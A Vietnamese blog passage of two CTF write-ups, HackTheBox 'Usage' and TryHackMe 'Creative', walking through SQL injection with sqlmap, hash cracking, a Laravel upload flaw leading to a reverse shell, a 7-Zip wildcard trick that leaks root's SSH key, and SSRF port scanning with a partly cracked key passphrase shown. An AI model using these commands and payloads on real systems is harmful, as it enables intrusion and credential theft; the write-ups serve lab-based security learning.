HackTheBox - Usage

03 May 2024 in CTF on Web, Linux, Sql injection, Laravel, SSH, Wildcards spare tricks, Hackthebox

Reconnaissance and Scanning
Enumeration
User.txt
Privilege escalation

intro

Usage là một machine mức độ easy lợi dụng lỗ hổng SQL injection để truy cập vào database và lấy thông tin đăng nhập của người dùng, sử dụng các lỗ hổng tồn tại trong phiên bản cũ của Laravel framework để tải lên RCE

Reconnaissance and Scanning

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
|   256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: HEAD
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Thêm domain và file host và truy cập web với port 80

one

Enumeration

Thử input các lỗ hổng SQLi và XSS đều không có kết quả, tôi dạo qua các phần khác của web này. Khi chọn Admin, tôi được đưa đến một subdomain khác là admin.usage.htb. Thêm nó vào file hosts để truy cập

two

Lại là một login form khác nhưng là để truy cập vào admin panel. Tôi cũng không thể thực hiện SQLi nên sẽ quay lại trang ban đầu.

Thử đăng ký tài khoản và đăng nhập, tuy nhiên sau khi login tôi cũng không nhận được gì đặc biệt ngoài các đoạn text

three

Vậy là chỉ còn phần Reset Password, tôi cũng nhận được một input nhập email. Tuy nhiên thử SQLi ở phần này thì server đã xử lý được payload của tôi

four

sqlmap

Sử dụng burpsuite để lấy nội dung request (bỏ payload).

five

Sử dụng sqlmap để thực hiện SQLi với request vừa lưu. Sử dụng parameter email để khai thác

┌──(kali㉿kali)-[~/HTB-Usage]
└─$ sudo sqlmap -r request.txt --level=5 --risk=3 -p email --dump --batch
        ___
       __H__                                                                                                                                                                                                            
 ___ ___["]_____ ___ ___  {1.8.4#stable}                                                                                                                                                                                
|_ -| . [.]     | .'| . |                                                                                                                                                                                               
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[23:57:30] [INFO] parsing HTTP request from 'request.txt'
[23:57:30] [INFO] resuming back-end DBMS 'mysql' 
[23:57:30] [INFO] testing connection to the target URL
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=MIkLtbJSRbSB12kmbrAHgIrQmZ5sfn3GNujMZt9v&email=admin@mail.com' AND 7936=(SELECT (CASE WHEN (7936=7936) THEN 7936 ELSE (SELECT 2488 UNION SELECT 3253) END))-- dkmV

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: _token=MIkLtbJSRbSB12kmbrAHgIrQmZ5sfn3GNujMZt9v&email=admin@mail.com' AND 3261=BENCHMARK(5000000,MD5(0x6f7a696c))-- QjGd
---
[23:57:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL 8
[23:57:30] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:57:30] [INFO] fetching current database
[23:57:30] [INFO] resumed: usage_blog
[23:57:30] [INFO] fetching tables for database: 'usage_blog'
[23:57:30] [INFO] fetching number of tables for database 'usage_blog'
[23:57:30] [INFO] resumed: 15
[23:57:30] [INFO] resumed: admin_menu
[23:57:30] [INFO] resumed: admin_operation_log
[23:57:30] [INFO] resumed: admin_permissions
[23:57:30] [INFO] resumed: admin_role_menu
[23:57:30] [INFO] resuming partial value: admi
[23:57:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:57:30] [INFO] retrieved: 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
n_role_permissions
[23:57:51] [INFO] retrieved: admin_role_users
[23:58:05] [INFO] retrieved: admin_roles
[23:58:11] [INFO] retrieved: admin_user_permissions
[23:58:46] [INFO] retrieved: admin_users
[23:58:53] [INFO] retrieved: blog
[23:59:01] [INFO] retrieved: failed_jobs
[23:59:24] [INFO] retrieved: migrations
[23:59:46] [INFO] retrieved: password_reset_token

Tiếp tục khai thác với db usage_blog và table admin_users

┌──(kali㉿kali)-[~/HTB-Usage]
└─$ sudo sqlmap -r request.txt --level=5 --risk=3 -D usage_blog -T admin_users --dump --batch
        ___
       __H__                                                                                                                                                                                                            
 ___ ___[']_____ ___ ___  {1.8.4#stable}                                                                                                                                                                                
|_ -| . ["]     | .'| . |                                                                                                                                                                                               
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                            

.......
[00:07:18] [INFO] fetching columns for table 'admin_users' in database 'usage_blog'
[00:07:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:07:18] [INFO] retrieved: 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
8
[00:07:22] [INFO] retrieved: avatar
[00:07:32] [INFO] retrieved: created_at
[00:07:53] [INFO] retrieved: id
[00:07:56] [INFO] retrieved: name
[00:08:03] [INFO] retrieved: password
[00:08:24] [INFO] retrieved: remember_token
[00:08:49] [INFO] retrieved: updated_at
[00:09:07] [INFO] retrieved: username
[00:09:20] [INFO] fetching entries for table 'admin_users' in database 'usage_blog'
[00:09:20] [INFO] fetching number of entries for table 'admin_users' in database 'usage_blog'
[00:09:20] [INFO] resumed: 1
[00:09:20] [INFO] retrieved: Administrator
[00:09:46] [INFO] retrieved:

Tiếp tục khai thác với 2 cột username và password

┌──(kali㉿kali)-[~/HTB-Usage]
└─$ sudo sqlmap -r request.txt --level=5 --risk=3 -D usage_blog -T admin_users -C username,password --dump --batch
        ___
       __H__                                                                                                                                                                                                            
 ___ ___[)]_____ ___ ___  {1.8.4#stable}                                                                                                                                                                                
|_ -| . [(]     | .'| . |                                                                                                                                                                                               
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                               
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                            

[00:12:26] [INFO] fetching entries of column(s) 'password,username' for table 'admin_users' in database 'usage_blog'
[00:12:26] [INFO] fetching number of column(s) 'password,username' entries for table 'admin_users' in database 'usage_blog'
[00:12:26] [INFO] resumed: 1
[00:12:26] [INFO] resumed: $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2
[00:12:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:12:26] [INFO] retrieved: 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
admin
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+

[00:12:36] [INFO] table 'usage_blog.admin_users' dumped to CSV file '/root/.local/share/sqlmap/output/usage.htb/dump/usage_blog/admin_users.csv'
[00:12:36] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 20 times
[00:12:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/usage.htb'

john

Copy hash này ra file và sử dụng john để crack password

┌──(kali㉿kali)-[~/HTB-Usage]
└─$ sudo john -w=/usr/share/wordlists/rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
**********        (?)     
1g 0:00:00:16 DONE (2024-05-07 00:17) 0.06112g/s 99.02p/s 99.02c/s 99.02C/s alexis1..serena
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Shell upload

Thử login vào admin panel

six

Vì đang có quyền admin rồi nên tôi sẽ tìm xem có chỗ nào để upload shell lên đây được không.

Ở trong account setting, tôi tìm thấy phần upload avatar. Tìm kiếm các lỗ hổng upload trên admin panel của laravel 1.8.17, tôi tìm thấy CVE-2023-24249

Tôi sẽ thêm payload vào một ảnh bất kỳ nào đó.

┌──(kali㉿kali)-[~/Downloads]
└─$  dp.jpg 
    1 image files updated

Upload ảnh này lên admin pannel (tích vào ô “Continue creating”) và bật Intercep: ON trên burpsuite để thực hiện upload

seven

Bật listener : nc -lnvp 9001

Truy cập vào url admin.usage.htb/uploads/images/ và thêm tên file shell vừa upload thành công vào cuối

┌──(kali㉿kali)-[~/Downloads]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.150] from (UNKNOWN) [10.10.11.18] 36368
bash: cannot set terminal process group (1227): Inappropriate ioctl for device
bash: no job control in this shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ id
id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
dash@usage:/var/www/html/project_admin/public/uploads/images$ 

User.txt

dash@usage:/var/www/html/project_admin/public/uploads/images$ cd
cd
dash@usage:~$ ls -la
ls -la
total 248
drwxr-x--- 6 dash dash   4096 May  7 08:48 .
drwxr-xr-x 4 root root   4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root      9 Apr  2 20:22 .bash_history -> /dev/null
-rw-r--r-- 1 dash dash   3771 Jan  6  2022 .bashrc
drwx------ 3 dash dash   4096 Aug  7  2023 .cache
drwxrwxr-x 4 dash dash   4096 Aug 20  2023 .config
drwxrwxr-x 3 dash dash   4096 Aug  7  2023 .local
-rw-r--r-- 1 dash dash     32 Oct 26  2023 .monit.id
-rw-r--r-- 1 dash dash      5 May  7 08:48 .monit.pid
-rw------- 1 dash dash   1192 May  7 08:48 .monit.state
-rwx------ 1 dash dash    707 Oct 26  2023 .monitrc
-rw-r--r-- 1 dash dash    807 Jan  6  2022 .profile
drwx------ 2 dash dash   4096 May  7 08:15 .ssh
-rwxr-xr-x 1 dash dash  55816 May  7 08:16 customchmod
-rwxr-xr-x 1 dash dash 141832 May  7 08:20 customcp
-rwxrwxrwx 1 dash dash      0 May  7 08:17 data
-rw-r----- 1 root dash     33 May  7 08:05 user.txt

Privilege escalation

Khai thác các file có trong thư mục của user dash, tôi tìm được một password trong file .monitrc

dash@usage:~$ cat .monitrc
cat .monitrc
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:******************

#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
    if cpu > 80% for 2 cycles then alert


#System Monitoring 
check system usage
    if memory usage > 80% for 2 cycles then alert
    if cpu usage (user) > 70% for 2 cycles then alert
        if cpu usage (system) > 30% then alert
    if cpu usage (wait) > 20% then alert
    if loadavg (1min) > 6 for 2 cycles then alert 
    if loadavg (5min) > 4 for 2 cycles then alert
    if swap usage > 5% then alert

check filesystem rootfs with path /
       if space usage > 80% then alert

Thử ssh với user dash nhưng không được. Kiểm tra /etc/passwd và tôi có thêm 1 user nữa là xander. Thử ssh vào user này với password vừa tìm được

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh xander@10.10.11.18
xander@10.10.11.18's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Tue May  7 08:50:59 AM UTC 2024

  System load:           0.5537109375
  Usage of /:            66.3% of 6.53GB
  Memory usage:          23%
  Swap usage:            0%
  Processes:             258
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.18
  IPv6 address for eth0: dead:beef::250:56ff:feb9:a482

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue May  7 08:34:25 2024 from 10.10.14.5
xander@usage:~$ 

Thử các cách khai thác đơn giản

xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management
    
xander@usage:~$ file /usr/bin/usage_management
/usr/bin/usage_management: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fdb8c912d98c85eb5970211443440a15d910ce7f, for GNU/Linux 3.2.0, not stripped

Sử dụng strings để xem file binary này, có một vài chỗ cần lưu ý

PTE1
u+UH
/var/www/html
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
Error changing working directory to /var/www/html
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql
Password has been reset.
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 
Invalid choice.

Phần /usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *, tôi đã tìm thấy cách khai thác nó trên hacktricks book, có tên là Wildcards Spare tricks

Tôi sẽ thử lấy private key của root (dù tôi không chắc là nó có tồn tại hay không)

xander@usage:~$ cd /var/www/html/
xander@usage:/var/www/html$ touch @id_rsa
xander@usage:/var/www/html$ ln -s /root/.ssh/id_rsa id_rsa
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7313P 16-Core Processor                (A00F11),ASM,AES-NI)

Open archive: /var/backups/project.zip
--       
Path = /var/backups/project.zip
Type = zip
Physical Size = 54871532

Scanning the drive:
          
WARNING: No more files
-----BEGIN OPENSSH PRIVATE KEY-----


WARNING: No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW


WARNING: No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi


WARNING: No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q


WARNING: No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs


WARNING: No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=


WARNING: No more files
-----END OPENSSH PRIVATE KEY-----

2984 folders, 17973 files, 113884398 bytes (109 MiB)

Updating archive: /var/backups/project.zip

Items to compress: 20957

                                                                               
Files read from disk: 17973
Archive size: 54871955 bytes (53 MiB)

Scan WARNINGS for files and folders:

-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07********************* : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1W*************************** : No more files
H2sfTWZeFDLGmqMhrqDdAAAA************************= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7

Copy nội dung của key này về, xóa hết phần thừa và lưu thành id_rsa

┌──(kali㉿kali)-[~/p0wny-shell]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/p0wny-shell]
└─$ ssh -i id_rsa  root@10.10.11.18 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Tue May  7 09:33:54 AM UTC 2024

  System load:           0.0390625
  Usage of /:            65.6% of 6.53GB
  Memory usage:          21%
  Swap usage:            0%
  Processes:             230
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.18
  IPv6 address for eth0: dead:beef::250:56ff:feb9:6f7b


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue May  7 09:02:51 2024 from 10.10.14.58
root@usage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@usage:~# ls -la
total 44
drwx------  7 root root 4096 May  7 08:53 .
drwxr-xr-x 19 root root 4096 Apr  2 21:15 ..
lrwxrwxrwx  1 root root    9 Apr  2 20:22 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwxr-xr-x  3 root root 4096 Aug 24  2023 .cache
-rwxr-xr-x  1 root root  307 Apr  3 13:24 cleanup.sh
drwxr-xr-x  4 root root 4096 Aug 22  2023 .config
drwxr-xr-x  3 root root 4096 Aug 21  2023 .local
lrwxrwxrwx  1 root root    9 Apr  2 20:22 .mysql_history -> /dev/null
-rw-r-----  1 root root   33 May  7 08:53 root.txt
drwx------  3 root root 4096 Aug  6  2023 snap
drwx------  2 root root 4096 Apr  2 23:07 .ssh
-rw-r--r--  1 root root 1444 Oct 28  2023 usage_management.c
root@usage:~#

Tryhackme - Creative

14 Apr 2024 in CTF on Tryhackme, Web, ffuf, Ssrf, Linux, Ld_preload, SSH

Reconnaissance and Scanning
Enumeration
SSH
Privilege escalation

TryHackMe - Creative

Reconnaissance and Scanning

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCsXwQrUw2YlhqFRnJpLvzHz5VnTqQ/Xr+IMJmnIyh82p1WwUsnFHgAELVccD6DdB1ksKH5HxD8iBoY83p3d/UfM8xlPzWGZkTAfZ+SR1b6MJEJU/JEiooZu4aPe4tiRdNQKB09stTOfaMUFsbXSYGjvf5u+gavNZOOTCQxEoKeZzPzxUJ0baz/Vx5Elihfm3MoR0nrE2XFTY6HV2cwLojeWCww3njG+P1E4salm86MAswQWxOeHLk/a0wXJ343X5NaHNuF4Xo3PpqiUr+qEZUyZJKNrH4O8hErH/2h7AUEPpPIo7zEK1ZzqFNWcpOqguYOFVZMagHS//ASg3ikzouZS1nUmS7ehA9bGrhCbqMRSin1QJ/mnwYBylW6IsPyfuJfl9KFnbTITa56URmudd999UzNEj8Wx8Qj4LfTWKLubcYS9iKN+exbAxXOIdbpolVtIFh0mP/cm9WRhf0z9WR9tX1FvJYi013rcaMpy62pjPCO20nbNsnEG6QckMk/4RM=
|   256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOIFbjvSW+v5RoDWDKFI//sn2LxlSxk2ovUPyUzpB1g/XQLlbF1oy3To2D8N8LAWwrLForz4IJ4JrZXR5KvRK8Y=
|   256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFf4qwz85WzZVwohJm4pYByLpBj7j2JiQp4cBqmaBwYV
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://creative.thm
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Thêm domain vào file hosts

nano /etc/hosts

10.10.55.1 creative.thm

Enumeration

Truy cập domain với port 80. Sau khi thử các phương pháp đơn giản đều không có kết quả, tôi thử tìm directory bằng dirsearch, trong khi chờ kết quả từ dirsearch, dựa vào việc machine này có domain, tôi nghĩ ngay đến việc tìm kiếm subdomain từ domain này. Sử dụng ffuf để tìm kiếm subdomain

dirsearch

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u http://creative.thm
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_creative.thm/_24-04-14_12-45-22.txt

Target: http://creative.thm/

[12:45:22] Starting: 
[12:46:05] 403 -  564B  - /assets/                                          
[12:46:05] 301 -  178B  - /assets  ->  http://creative.thm/assets/          
                                                                             
Task Completed

ffuf

┌──(root㉿kali)-[/home/kali]
└─# ffuf -u http://creative.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.creative.thm" -mc 200


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://creative.thm
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.creative.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

beta                    [Status: 200, Size: 591, Words: 91, Lines: 20, Duration: 252ms]
:: Progress: [114441/114441] :: Job [1/1] :: 178 req/sec :: Duration: [0:11:26] :: Errors: 0 ::

Truy cập /assets/ nhưng tôi gặp lỗi Forbbiden - không có quyền truy cập vào dir này. Quay lại với subdomain vừa tìm được, thêm nó vào file hosts

nano /etc/hosts

10.10.55.1 creative.thm beta.creative.thm

Truy cập vào subdomain mới

Tôi có một trang web kiểm tra URL ở đây. Sau một lúc thử nghiệm các input, tôi nhận ra với các input sai (không phải định dạng URL hoặc bất kỳ điều gì, thay vì kiểm tra và trả về kết quả input sai định dạng thì web server trả về kết quả là 1 chữ Dead. Điều này có nghĩa là server sẽ xử lý bất kỳ input nào tôi nhập vào -> tôi có thể thực hiện SSRF ở đây.

Sử dụng SSRFmap để kiểm tra.

Đầu tiên, tôi sử dụng Burpsuite để bắt request

Lưu request này vào 1 file với tên resquest.txt

POST / HTTP/1.1
Host: beta.creative.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://beta.creative.thm
Connection: close
Referer: http://beta.creative.thm/
Upgrade-Insecure-Requests: 1

url=..%2F..%2F..%2F..%2Fect%2Fpasswd

Với parameter ở request này là url, tôi sẽ sử dụng SSRFmap với các module có khả năng trả về kết quả như portscan, networkscan, custom (các module khác không được sử dụng do không có dịch vụ chạy trên web server này tránh mất thời gian vào việc scan)

Sau khi sử dụng module portscan tôi tìm được 1 port khác ngoài port 80 đang mở trên localhost

┌──(root㉿kali)-[/home/kali/SSRFmap]
└─# python ssrfmap.py -r request.txt -p url -m portscan
 _____ _________________                     
/  ___/  ___| ___ \  ___|                    
\ `--.\ `--.| |_/ / |_ _ __ ___   __ _ _ __  
 `--. \`--. \    /|  _| '_ ` _ \ / _` | '_ \ 
/\__/ /\__/ / |\ \| | | | | | | | (_| | |_) |
\____/\____/\_| \_\_| |_| |_| |_|\__,_| .__/ 
                                      | |    
                                      |_|    
[INFO]:Module 'portscan' launched !
        [13:26:45] IP:127.0.0.1   , Found filtered  port n°443                    
        [13:26:45] IP:127.0.0.1   , Found filtered  port n°23                    
        [13:26:45] IP:127.0.0.1   , Found filtered  port n°25                    
        [13:26:45] IP:127.0.0.1   , Found open      port n°80    
        .....
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°3999                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°740                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°12346                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°802                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°1127                    
        [13:28:21] IP:127.0.0.1   , Found open      port n°1337                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°606                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°2600                    
        [13:28:21] IP:127.0.0.1   , Found filtered  port n°1414   
        ......

Để truy cập được các path này, tôi phải quay lại và nhập thêm path vào url để kiểm tra. Để việc này dễ dàng hơn thì tôi sẽ sử dụng Burpsuite để bắt request này và cho nó vào repeater

Phần url đã được encode nên để truy cập được các path tôi cũng sẽ phải encode theo url format

SSH

Để ý có thư mục .ssh, có thể sẽ lưu ssh key ở đây

Lấy id_rsa

Lưu key này về và login ssh

┌──(root㉿kali)-[/home/kali]
└─# chmod 600 id_rsa                   
                                                                                                                                                                                                                                                             
┌──(root㉿kali)-[/home/kali]
└─# ssh -i id_rsa saad@10.10.55.1      
The authenticity of host '10.10.55.1 (10.10.55.1)' can't be established.
ED25519 key fingerprint is SHA256:09XvTnhtDcy1LRcuA8MJ6i3a1gN/7Prv5xmZF9v8Gq4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.55.1' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 

Vậy là tôi cần passphrase. Sử dụng john để crack pass từ key này

┌──(root㉿kali)-[/home/kali]
└─# ssh2john id_rsa > id_rsa.hash

┌──(root㉿kali)-[/home/kali]
└─# john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
***********        (id_rsa)     
1g 0:00:00:26 DONE (2024-04-14 14:02) 0.03818g/s 36.65p/s 36.65c/s 36.65C/s 242424..marie1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(root㉿kali)-[/home/kali]
└─# john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sweetness        (id_rsa)     
1g 0:00:00:26 DONE (2024-04-14 14:02) 0.03818g/s 36.65p/s 36.65c/s 36.65C/s 242424..marie1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                                                             
┌──(root㉿kali)-[/home/kali]
└─# ssh -i id_rsa saad@10.10.55.1                                                                 
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

